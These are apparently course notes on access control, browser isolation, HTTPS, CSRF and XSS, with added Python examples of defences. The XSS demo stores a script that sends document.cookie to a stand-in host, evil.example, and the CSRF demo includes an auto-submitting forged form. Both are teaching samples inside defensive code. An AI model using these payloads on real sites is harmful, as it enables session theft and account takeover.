Unit 3 (CSS Notes)

The document discusses access control, which dictates who can access company information and resources through authentication and authorization. It describes the main types of access control models: discretionary access control, mandatory access control, role-based access control, and attribute-based access control. Access control is important for securing data and keeping it out of the wrong hands. It also discusses some common issues with access control like not being secure enough, keycards lacking true authorization, improper setup, and inefficient management.

UNIT :3

Access control

Access control is a fundamental component of data security that dictates
who’s allowed to access and use company information and resources.
Through authentication and authorization, access control policies make
sure users are who they say they are and that they have appropriate access
to company data.
Access control can also be applied to limit physical access to campuses,
buildings, rooms, and datacenters.

How does access control work?

Access control identifies users by verifying various login credentials,
which can include usernames and passwords, PINs, biometric scans, and
security tokens. Many access control systems also include multifactor
authentication (MFA), a method that requires multiple authentication
methods to verify a user’s identity.
Once a user is authenticated, access control then authorizes the
appropriate level of access and allowed actions for that user’s verified
identity, often taking request context such as the source IP address into
account.
There are four main types of access control. Organizations typically
choose the method that makes the most sense based on their unique
security and compliance requirements. The four access control models are:
1. Discretionary access control (DAC): In this method, the owner
or administrator of the protected system, data, or resource sets the
policies for who is allowed access (for example, a file owner granting
read access to another user).
2. Mandatory access control (MAC): In this nondiscretionary
model, people are granted access based on a security clearance that is
compared with the classification label of the resource. A central
authority, not the resource owner, regulates access rights based on these
security levels. This model is common in government and military
environments.
3. Role-based access control (RBAC): RBAC grants access based
on defined business functions rather than the individual user’s identity.
The goal is to provide users with access only to data that’s been deemed
necessary for their roles within the organization. This widely used
method is based on a combination of role assignments, role
authorizations, and permission assignments.
4. Attribute-based access control (ABAC): In this dynamic method,
access is based on a set of attributes and environmental conditions, such
as time of day and location, assigned to both users and resources.
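The following is an added example, not code from the original notes: a minimal policy decision point that answers the same question, "may this subject perform this action on this resource?", under each of the four models above. The users, roles, clearance labels, departments and the office-hours rule are all constructed for illustration; the MAC part uses the Bell-LaPadula read/write rules, which the notes do not name but which are the classic instance of a central label lattice.

```python
# Added example (not from the original notes): a minimal policy decision
# point that answers "may this subject perform this action on this
# resource?" under each of the four models. Users, roles, labels and
# attribute values are constructed for illustration.
from dataclasses import dataclass, field


# ---- DAC: the resource owner keeps the access list ------------------------
@dataclass
class DacResource:
    owner: str
    acl: dict = field(default_factory=dict)   # principal -> set of actions


def dac_grant(res: DacResource, granter: str, principal: str, action: str) -> None:
    """Only the owner may change the ACL; that discretion is what makes it DAC."""
    if granter != res.owner:
        raise PermissionError(f"{granter} does not own this resource")
    res.acl.setdefault(principal, set()).add(action)


def dac_allows(res: DacResource, principal: str, action: str) -> bool:
    return principal == res.owner or action in res.acl.get(principal, set())


# ---- MAC: central labels compared on a fixed lattice (Bell-LaPadula) ------
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top_secret": 3}


def mac_allows(clearance: str, classification: str, action: str) -> bool:
    """Simple security property (no read up) and *-property (no write down).
    The subject cannot change either label; a central authority assigns them."""
    subj, obj = LEVELS[clearance], LEVELS[classification]
    if action == "read":
        return subj >= obj
    if action == "write":
        return subj <= obj
    return False


# ---- RBAC: permissions attach to roles, users are assigned roles ----------
ROLE_PERMS = {
    "teller":  {"account:read", "account:deposit"},
    "manager": {"account:read", "account:deposit", "account:approve_loan"},
}
USER_ROLES = {"alice": {"teller"}, "bob": {"manager"}}


def rbac_allows(user: str, permission: str) -> bool:
    """A user holds a permission only through one of their assigned roles."""
    return any(permission in ROLE_PERMS.get(role, set())
               for role in USER_ROLES.get(user, set()))


# ---- ABAC: a rule over subject, resource and environment attributes -------
def abac_allows(subject: dict, resource: dict, env: dict) -> bool:
    """Policy: same department as the record, during office hours (09:00-18:00,
    env["hour"] is the hour of day), and from the corporate network."""
    return (subject["department"] == resource["department"]
            and 9 <= env["hour"] < 18
            and env["network"] == "corporate")


if __name__ == "__main__":
    doc = DacResource(owner="alice")
    dac_grant(doc, "alice", "bob", "read")
    print("DAC  bob may read alice's file:", dac_allows(doc, "bob", "read"))
    print("MAC  secret clearance reads top_secret:", mac_allows("secret", "top_secret", "read"))
    print("RBAC teller approves a loan:", rbac_allows("alice", "account:approve_loan"))
    print("ABAC HR record, HR user, 22:00, corporate network:",
          abac_allows({"department": "hr"}, {"department": "hr"},
                      {"hour": 22, "network": "corporate"}))
```

The contrast worth noticing: under DAC a compromised owner account (or malware running as it) can hand out access at will, whereas under MAC neither party can relabel anything, which is why the notes place MAC in government and military settings.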

Why is access control important?

Access control keeps confidential information such as customer data, personally
identifiable information, and intellectual property from falling into the wrong
hands. It’s a key component of the modern zero trust security framework, which
uses various mechanisms to continuously verify access to the company network.
Without robust access control policies, organizations risk data leakage from both
internal and external sources.
Access control is particularly important for organizations with hybrid
cloud and multi-cloud environments, where resources, apps, and data
reside both on premises and in the cloud. Access control can provide these
environments with more robust access security.

UNIX AND WINDOWS DIFFERENCES

No. | Parameter | UNIX | Windows
1. | Basic | It is a command-based operating system. | It is a menu-based operating system.
2. | Licensing | Unix-like systems such as Linux (under the GNU General Public License) and the BSDs are open source; the original UNIX itself was proprietary. | It is proprietary software owned by Microsoft.
3. | User interface | It has a text-based interface by default, making it harder to grasp for newcomers. | It has a Graphical User Interface, making it simpler to use.
4. | Processing | It supports multiprocessing and multithreading. | It supports multiprocessing and multithreading.
5. | File system | | 
6. | Security | Users normally run unprivileged; changes to the system require explicit root (superuser) permission, which is why it is generally considered more secure. | Traditionally considered less secure than UNIX; modern versions add comparable controls (User Account Control, file ACLs).
7. | Data backup & recovery | It is tedious to create a backup and recovery system in UNIX, but it is improving with the introduction of new distributions. | It has an integrated backup and recovery system that makes it simpler to use.
8. | Hardware | Hardware support is limited; some hardware might not have drivers built for it. | Drivers are available for almost all hardware.
9. | Reliability | Unix and its distributions are well known for being very stable to run. | Although Windows has been stable in recent years, it has yet to match the stability provided by Unix systems.
10. | Case sensitivity | It is fully case-sensitive: file.txt and File.txt are separate files. | File names are case-insensitive by default; case sensitivity is available as an option.

Some issues in Access control

1. Not Secure Enough (a single weak factor, such as a password alone, is easily defeated)
2. Keycards Lack True Authorization (a card proves possession, not who is holding it, so a lost or cloned card grants its bearer the same access)
3. Improper Setup (overly broad or stale permissions)
4. Inefficient Management (access reviews and revocations not kept up to date)

Browser isolation

Browser Isolation (also known as Web Isolation) is a technology that
contains web browsing activity inside an isolated environment, like a
sandbox or virtual machine, in order to protect computers from any
malware the user may encounter.
This isolation may occur locally on the computer or remotely on a server.
Browser Isolation technology provides malware protection for day-to-day
browsing by eliminating the opportunity for malware to access the end
user’s device.
Browser Isolation essentially secures a computer/network from web-based
threats by executing all browsing activity in an isolated virtual
environment. Possible threats are contained in this environment and can’t
infiltrate any part of the user’s ecosystem, such as their computer’s
hard drive, or other devices on the network. Even though Browser Isolation
is gaining traction as an IT security solution, a lot of misinformation
regarding Browser Isolation remains.

What’s the difference between Browser Isolation and Remote Browser Isolation?

Remote Browser Isolation is a specific implementation of Browser
Isolation that occurs remotely by moving the execution of all browsing
activity from the user’s computer to a remote server. This remote server
can be hosted in the cloud or located on-premises within an organization’s
network.
However, in the cybersecurity industry, when someone says Browser
Isolation they often really mean Remote Browser Isolation.
The benefit of performing the isolation remotely is that it offers greater
security and requires fewer client-side resources as compared to
performing the isolation locally on the user’s computer.
How does Browser Isolation technology work?

There are different implementation details that vary amongst Browser
Isolation vendors but generally, Browser Isolation works by:

 Removing browsing activity from a user’s computer and
executing it in a virtual environment.
 Automatically destroying the browsing environment at the end
of every browsing session, so if the user ever comes across
anything malicious, it gets wiped away at the end of the session.
When the user connects to the secure virtual browser again,
he/she gets a clean, new image free of any malware. While this
isn’t a requirement for Browser Isolation to work, it’s likely a
common feature in various solutions.

Web Security
Web security is a branch of cybersecurity. It basically means
protecting a website or web application by detecting, preventing and
responding to cyber threats.
Websites and web applications are just as prone to security breaches as
physical homes, stores, and government locations. Unfortunately,
cybercrime happens every day, and strong web security measures are
needed to protect websites and web applications from becoming
compromised.
That’s exactly what web security does – it is a system of protection
measures and protocols that can protect your website or web application
from being hacked or accessed by unauthorized parties. This integral
division of Information Security is vital to the protection of websites, web
applications, and web services. Anything that is exposed over the Internet
should have some form of web security to protect it.

Threats:
Your website or web application’s security depends on the level of
protection tools that have been equipped and tested on it. There are a few
major threats which are the most common ways in which a website or web
application becomes compromised. Some of the top vulnerabilities and
attack outcomes for web-based services include:

 SQL injection
 Password breach
 Cross-site scripting
 Data breach
 Remote file inclusion
 Code injection

Preventing these common threats is the key to making sure that your web-
based service is practicing the best methods of security.
Web Security also protects the visitors from the below-mentioned
points –

 Stolen Data: Cyber-criminals frequently steal visitors’ data that is
stored on a website, like email addresses, payment information, and
a few other details.
 Phishing schemes: This is not just related to email; through
phishing, hackers design a layout that looks exactly like the
website to trick users into giving up their sensitive details.
 Session hijacking: Certain cyber attackers can take over a user’s
session (for example by stealing the session cookie) and compel them
to take undesired actions on a site.
 Malicious redirects: Sometimes the attacks can redirect visitors
from the site they visited to a malicious website.
 SEO spam: Unusual links, pages, and comments can be placed
on a site by the hackers to distract your visitors and drive traffic to
malicious websites.

Web security controls are generally straightforward to deploy and help
site owners make their website safe and secure. A web application firewall
(WAF), for instance, blocks many automated attacks that usually target
small or lesser-known websites. These attacks are carried out by
malicious bots or malware that automatically scan for vulnerabilities they
can misuse, or cause DDoS attacks that slow down or crash your website.
Thus, web security is extremely important, especially for websites or
web applications that deal with confidential, private, or protected
information. Security methods are evolving to match the different types
of vulnerabilities that come into existence.
Differences between HTTP and HTTPS
 HTTP stands for HyperText Transfer Protocol and HTTPS stands
for HyperText Transfer Protocol Secure.
 In HTTP, the URL begins with “http://” whereas in HTTPS the URL
starts with “https://”.
 HTTP uses port number 80 for communication and HTTPS uses 443.
 HTTP is considered to be insecure (traffic is sent in cleartext and can
be read or modified in transit) and HTTPS is secure.
 Both HTTP and HTTPS are application-layer protocols; HTTPS is simply
HTTP carried over TLS, which sits between the transport layer (TCP) and
the application layer and provides encryption, integrity, and server
authentication.
 In HTTP, encryption is absent; in HTTPS, encryption is present, as
discussed above.
 HTTP does not require any certificates, whereas HTTPS needs a TLS
certificate (commonly still called an SSL certificate) issued to the
server so that the client can verify which server it is talking to.
 HTTP is marginally faster than HTTPS because HTTPS adds the TLS
handshake and encryption; with modern TLS (1.3) and HTTP/2 the
difference is small.
 HTTP does not improve search ranking, while HTTPS is treated as a
positive ranking signal by search engines.

What is CSRF?
Cross-site request forgery (also known as CSRF) is a web security
vulnerability that allows an attacker to induce users to perform actions
that they do not intend to perform.

It allows an attacker to partly circumvent the same origin policy, which is
designed to prevent different websites from interfering with each other.

What is the impact of a CSRF attack?

In a successful CSRF attack, the attacker causes the victim user to carry
out an action unintentionally. For example, this might be to change the
email address on their account, to change their password, or to make a
funds transfer. Depending on the nature of the action, the attacker might
be able to gain full control over the user's account. If the compromised
user has a privileged role within the application, then the attacker might
be able to take full control of all the application's data and functionality.
How does CSRF work?

For a CSRF attack to be possible, three key conditions must be in place:

 A relevant action. There is an action within the application that
the attacker has a reason to induce. This might be a privileged
action (such as modifying permissions for other users) or any
action on user-specific data (such as changing the user's own
password).
 Cookie-based session handling. Performing the action involves
issuing one or more HTTP requests, and the application relies
solely on session cookies to identify the user who has made the
requests. There is no other mechanism in place for tracking
sessions or validating user requests. (Because the browser attaches
the cookie automatically, a request triggered from an attacker’s page
carries the victim’s session.)
 No unpredictable request parameters. The requests that perform
the action do not contain any parameters whose values the attacker
cannot determine or guess. For example, when causing a user to
change their password, the function is not vulnerable if an attacker
needs to know the value of the existing password.

Preventing CSRF attacks

The most robust way to defend against CSRF attacks is to include
a CSRF token within relevant requests. The token should be:

 Unpredictable with high entropy, as for session tokens in general.
 Tied to the user's session.
 Strictly validated in every case before the relevant action is
executed.
The SameSite cookie attribute (Lax or Strict) is a useful additional
layer that stops the browser from sending the session cookie on most
cross-site requests, but it should complement, not replace, the token.
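The following is an added example, not code from the original notes or from any particular framework: a synchronizer-token CSRF defence for the "change email address" action the impact section mentions, modelled without a web server so it runs stand-alone. The in-memory SESSIONS store, the function names, the attacker page and the host names bank.example and evil.example are all constructed for illustration.

```python
# Added example (not from the original notes): a synchronizer-token CSRF
# defence for a "change email" action, modelled without a web framework.
# SESSIONS stands in for server-side session storage; the attacker page and
# the requests below are constructed for illustration.
import hmac
import secrets

SESSIONS = {}          # session cookie value -> session data (constructed store)


def login(user):
    """Creates a session and a per-session CSRF token (high entropy, session-bound)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "user": user,
        "email": f"{user}@example.com",
        "csrf": secrets.token_urlsafe(32),   # unpredictable, tied to this session
    }
    return sid


def render_change_email_form(sid):
    """The legitimate page embeds the session's token in a hidden field; an
    attacker's page cannot read it because of the same-origin policy."""
    token = SESSIONS[sid]["csrf"]
    return (
        '<form method="POST" action="/change-email">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="email"><button>Save</button></form>'
    )


def change_email(cookie_sid, form):
    """POST /change-email handler: identifies the user by the session cookie,
    then strictly validates the token before performing the state change."""
    sess = SESSIONS.get(cookie_sid)
    if sess is None:
        return 401, "no session"
    submitted = form.get("csrf_token", "")
    # Constant-time compare so the token cannot be recovered byte by byte via timing.
    if not hmac.compare_digest(submitted, sess["csrf"]):
        return 403, "CSRF token missing or invalid"
    sess["email"] = form["email"]
    return 200, "email updated"


# Attacker-controlled page (constructed): it makes the victim's browser POST
# to the bank with the victim's cookie attached, but it has no way to supply
# the victim's token.
ATTACKER_PAGE = (
    '<form id="f" method="POST" action="https://bank.example/change-email">'
    '<input type="hidden" name="email" value="attacker@evil.example"></form>'
    '<script>document.getElementById("f").submit()</script>'
)


def simulate_csrf(victim_sid):
    """What the server receives when ATTACKER_PAGE fires: cookie present, token absent."""
    return change_email(victim_sid, {"email": "attacker@evil.example"})


if __name__ == "__main__":
    sid = login("alice")
    print("forged request:", simulate_csrf(sid))            # (403, ...)
    print("legitimate request:", change_email(
        sid, {"csrf_token": SESSIONS[sid]["csrf"],
              "email": "alice.new@example.com"}))           # (200, ...)
    print("stored email:", SESSIONS[sid]["email"])
```

Two points the example makes concrete: the check must run on every state-changing request (a handler that skips it when the field is absent reintroduces the bug), and the token must be compared against the value held in the victim's own session, so a token the attacker obtains from their own account is useless.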

Cross-site scripting attack

Cross site scripting (XSS) is an attack in which an attacker injects
malicious executable scripts into the code of a trusted application or
website, so that they run in other users’ browsers with that site’s
privileges. Attackers often initiate an XSS attack by sending a malicious
link to a user and enticing the user to click it.
What are the different cross site scripting approaches
Stored XSS. Takes place when the malicious payload is stored on the server
(for example in a database, a comment field, or a log). It renders to other
users when the data is requested, if there is no output encoding or
sanitization.
Reflected XSS. Occurs when a web application sends attacker-provided
strings (typically taken from the request URL or parameters) straight back
to a victim’s browser so that the browser executes part of the string as
code. The payload echoes back in the response because there is no
server-side output encoding.
DOM-based XSS. Takes place when legitimate client-side JavaScript reads
attacker-controlled data from the document object model (DOM), such as
the URL fragment or a query parameter, and writes it into a dangerous sink
such as innerHTML or eval without encoding. The attacker crafts a
malicious URL and tricks a user into clicking it. If the user clicks the
link, the attacker can steal the user’s active session information,
keystrokes, and so on. Unlike stored XSS and reflected XSS, the entire
DOM-based XSS attack happens in the client browser; if the payload is
carried in the URL fragment, nothing malicious is even sent to the server.

How can you avoid XSS vulnerabilities

Strategies to prevent XSS attacks include these:

 Never trust user input.
 Implement output encoding.
 Perform user input validation.
 Follow the defense in depth principle.
 Ensure that web application development aligns with OWASP’s
XSS Prevention Cheat Sheet.
 After remediation, perform penetration testing to confirm it was
successful.
Protect your organization by following secure development guidelines—
building security in at all phases of the application’s development. Output
encoding is also key to preventing XSS vulnerabilities. Make use of
output encoding libraries that are relevant to the programming languages
and frameworks your organization uses. Also, ensure your developers
stay up-to-date with XSS prevention best practices.
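The following is an added example, not code from the original notes: the stored-XSS rendering bug described above beside its fix, showing that output encoding has to match the context the data lands in (HTML body, quoted attribute, JavaScript string). The comment store, the function names and the payloads are constructed for illustration; html.escape and json.dumps are the Python standard-library encoders.

```python
# Added example (not from the original notes): a stored-XSS rendering bug
# beside its context-aware output-encoding fix. COMMENTS stands in for the
# database a stored payload lives in; payloads are constructed for illustration.
import html
import json

COMMENTS = []


def post_comment(author, text):
    """Input validation limits what is accepted, but cannot be the only defence:
    quotes and angle brackets are legitimate in many comments."""
    if not 0 < len(text) <= 500:
        raise ValueError("comment length out of range")
    COMMENTS.append({"author": author, "text": text})


def render_vulnerable():
    """Raw interpolation: stored data is re-emitted as HTML, so a payload stored
    by one user executes in every other user's browser."""
    return "".join(f'<p class="c" data-author="{c["author"]}">{c["text"]}</p>'
                   for c in COMMENTS)


def render_safe():
    """Encode for the HTML context: element body and quoted attribute both use
    html.escape, which by default also escapes the quote characters."""
    return "".join(
        f'<p class="c" data-author="{html.escape(c["author"], quote=True)}">'
        f'{html.escape(c["text"])}</p>'
        for c in COMMENTS)


def render_js_safe(value):
    """JavaScript-string context: HTML encoding is the wrong tool because the
    browser tokenizes the <script> body before any JS runs. json.dumps escapes
    quotes and control characters; "</" is additionally broken up so the
    string can never close the script element, and the two Unicode line
    terminators that json.dumps leaves raw are escaped as well."""
    encoded = json.dumps(value)
    encoded = (encoded.replace("</", "<\\/")
                      .replace("\u2028", "\\u2028")
                      .replace("\u2029", "\\u2029"))
    return f"<script>var lastComment = {encoded};</script>"


if __name__ == "__main__":
    post_comment('x" onmouseover="alert(1)',
                 "<script>location='https://evil.example/?c='+document.cookie</script>")
    print("vulnerable:", render_vulnerable())
    print("safe:      ", render_safe())
    print("js context:", render_js_safe("</script><script>alert(1)</script>"))
```

The attribute case is the one developers most often miss: the author string carries no angle brackets at all, so a filter that only strips tags would pass it, yet in the vulnerable renderer it closes the attribute and adds an event handler. Encoding the quote characters for that context is what closes the hole.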
